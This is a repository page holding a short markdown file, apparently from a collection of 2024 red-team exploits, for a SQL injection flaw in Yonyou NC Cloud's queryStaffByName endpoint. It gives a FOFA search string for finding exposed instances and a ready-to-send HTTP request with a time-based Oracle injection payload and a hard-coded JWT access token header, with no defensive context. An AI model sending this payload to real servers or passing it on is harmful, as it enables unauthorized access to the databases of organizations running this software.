ibaiw/2024Hvv
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
dca4284a493278e19dfb4512a8afa0fd47b162ce
2024Hvv/用友NC Cloud queryStaffByName SQL注入漏洞.md
ibaiw dca4284a49 add
2024-08-06 17:56:12 +08:00

409 B
Raw Blame History

fofa

product="用友-NC-Cloud"

GET /ncchr/pm/staff/queryStaffByName?name=1%27%20AND%201=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--+ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Connection: close